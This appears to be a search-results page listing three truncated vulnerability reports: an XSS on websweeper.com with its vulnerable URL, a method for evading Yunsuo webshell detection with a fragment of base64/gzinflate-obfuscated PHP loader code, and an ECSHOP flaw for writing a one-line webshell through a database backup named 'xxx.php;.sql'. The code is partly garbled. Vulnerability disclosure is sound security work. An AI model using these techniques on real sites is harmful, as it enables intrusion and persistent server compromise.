23 matches found
websweeper.com XSS vulnerability
Vulnerable URL: http://www.websweeper.com/liner/tank-liner/quote-attachment.php?shape=1"...
云锁最新版1.3.145绕过webshell检测
简要描述: webshell检测绕过 详细说明: 一句话马+大马绕过检测 漏洞证明: 1.一句话木马,单纯用这种方式肯定会被检测到,我们采用这种方式: 结果发现只有一开始说的那种文件被检测到: 2.大马,采用base64+gzinflate压缩编码,大马文件如下: ?php function CLsI$ZzvSWE $ZzvSWE=gzinflatebase64decode$ZzvSWE; for$i=0;$istrlen$ZzvSWE;$i++ $ZzvSWE$i = chrord$ZzvSWE$i-1; return $ZzvSWE;...
ECSHOP网站程序可以绕过权限上传一句话木马
简要描述: 可以绕过权限上传一句话木马 详细说明: 前台留个言,内容是我们的一句话木马: 接着在后台系统==数据库管理==数据备份==选择自定义备份,选择ecsfeedback这张表(存放留言的表) 备份文件名:xxx.php;.sql 这种格式来备份 提示成功了。 漏洞证明: img src="https://images.seebug.org/upload/201303/2823440078ad987d1e1...